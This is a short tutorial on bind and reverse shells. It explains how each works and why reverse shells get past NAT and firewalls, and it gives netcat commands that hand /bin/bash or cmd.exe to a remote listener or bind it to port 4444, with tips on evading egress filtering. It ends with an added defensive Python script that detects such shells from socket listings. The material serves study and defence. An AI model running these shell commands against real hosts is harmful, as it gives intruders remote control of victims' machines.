Bind and Reverse shell

  • Reverse shells can be initiated using many different programming and scripting languages, including PHP, ASP, Python, Perl and PowerShell. If you have managed to get code execution on a compromised host, or you can inject code, upload or include files in a web application, this can often be turned into a command-line shell with a little work, whatever the platform or application language. For receiving the shell on the attack box, several different tools can be used, such as Netcat, Metasploit and Empire.

  • A bind shell, like a reverse shell, also runs on the target host, but instead of connecting back to a listening host it binds to a specific port and waits for incoming connections. In malicious software terms, a bind shell is what is referred to as a ‘backdoor’.

Reverse shell

One advantage of reverse shells is that they have the highest success rate when there are firewalls and NAT devices between the attacker and the victim. For instance, when the target host connects to the internet through a NAT device, an attacker cannot connect to the target host directly without first reconfiguring the target’s networking equipment. In this situation a bind shell will not work, but it may still be possible to establish a connection using a reverse shell. Another advantage of reverse shells is that outgoing connections are normally not as heavily filtered by a firewall as incoming connections. Even so, keep in mind that egress rules may apply, and suspicious connections (such as connections to port 4444) may still get flagged and blocked, preventing the reverse shell from reaching you. Traffic that looks like legitimate traffic is less likely to be blocked.

Attacker

nc -lvp 4444
# listen (-l) verbosely (-v) on port (-p) 4444 for incoming connections

Target

nc <ip> 4444 -e /bin/bash
# Linux target: connect to the attacker's <ip>:4444 and run /bin/bash
# with the socket as stdin/stdout (requires a netcat build that supports -e)

nc <ip> 4444 -e cmd.exe
# Windows target: same, running cmd.exe

Bind shell

As explained earlier in this chapter a bind shell is a shell that binds to a specific port on the target host to listen for incoming connections. In this case the attack box connects to the target host on a specific port (rather than the target sending the shell back to the attack box as in a reverse shell).

Target

nc -lvp 4444 -e /bin/bash
# listen on port 4444 and hand /bin/bash to whoever connects

Attacker

nc <target_ip> 4444
# connect to the port the bind shell is listening on

IMP: When working with bind shells it is important to realize their limitations. First of all, the attacker must have a route to the target. If the target is behind a NAT device, the bind shell will open a port on the local network that is inaccessible to the attacker. Another important factor is that a bind shell can only bind to an open and unused port. Thus, if there is a web server running on ports 80 and 443 and you try to bind a shell to one of these ports to make your traffic look legitimate, the bind will fail. Lastly, it is very common for unusual ports to be blocked by firewalls. Most firewalls are configured to allow only specific traffic to known services. If a firewall blocks traffic to the port your bind shell is listening on, you may be able to open the port on the target host, but you will not be able to connect to it. In this sort of scenario, a reverse shell has a better chance of success.
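A defender-side check that applies the bind/reverse distinction above, added here as an example and not part of the original notes: it parses constructed `ss -tanp` style output (Linux) and labels sockets owned by netcat or a shell as bind-shell or reverse-shell patterns. The watched process list, the flagged-port set and the ephemeral-port heuristic are assumptions to tune for your own environment.

```python
import re
# Added example, not from the original notes: labels `ss -tanp` sockets owned by
# netcat or a shell by the bind/reverse patterns above. Sample input is constructed.
WATCHED = {"nc", "ncat", "netcat", "bash", "sh", "dash", "cmd.exe", "powershell.exe"}
FLAGGED_PORTS = {4444}     # ports the notes single out as commonly blocked/flagged
EPHEMERAL_MIN = 32768      # Linux default ip_local_port_range lower bound (assumption)
PROC_RE = re.compile(r'\(\("([^"]+)",pid=(\d+)')

def parse_ss_line(line):
    """Return (state, local_port, peer_port, proc, pid) or None for header/junk."""
    parts = line.split()
    m = PROC_RE.search(parts[5]) if len(parts) >= 6 else None
    if m is None:
        return None
    local_port = int(parts[3].rsplit(":", 1)[1])
    peer = parts[4].rsplit(":", 1)[1]
    return parts[0], local_port, 0 if peer == "*" else int(peer), m.group(1), int(m.group(2))

def classify(rec):
    """'bind-shell', 'reverse-shell' or 'ok' for one parsed socket (heuristic)."""
    state, local_port, _peer_port, proc, _pid = rec
    if proc not in WATCHED:
        return "ok"
    if state == "LISTEN":
        return "bind-shell"   # watched process waiting for inbound connections
    if state == "ESTAB":
        # An outbound (reverse) connection uses an ephemeral local port; a
        # connected bind shell keeps the fixed port it was bound to.
        return "reverse-shell" if local_port >= EPHEMERAL_MIN else "bind-shell"
    return "ok"

def scan(ss_output):
    """Return [(pid, proc, verdict, on_flagged_port)] for suspicious sockets."""
    findings = []
    for line in ss_output.splitlines():
        rec = parse_ss_line(line)
        verdict = classify(rec) if rec else "ok"
        if verdict != "ok":
            _state, lp, pp, proc, pid = rec
            findings.append((pid, proc, verdict, lp in FLAGGED_PORTS or pp in FLAGGED_PORTS))
    return findings

SAMPLE = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port  Process
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN 0      1      0.0.0.0:4444       0.0.0.0:*          users:(("nc",pid=2231,fd=3))
ESTAB  0      0      10.0.0.5:40122     10.0.0.9:4444      users:(("bash",pid=2319,fd=3))
ESTAB  0      0      10.0.0.5:443       203.0.113.7:51044  users:(("nginx",pid=901,fd=12))
"""
```

Running `scan(SAMPLE)` reports the listening `nc` on 4444 as a bind-shell pattern and the `bash` process connected out to port 4444 as a reverse-shell pattern, while sshd and nginx are left alone.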
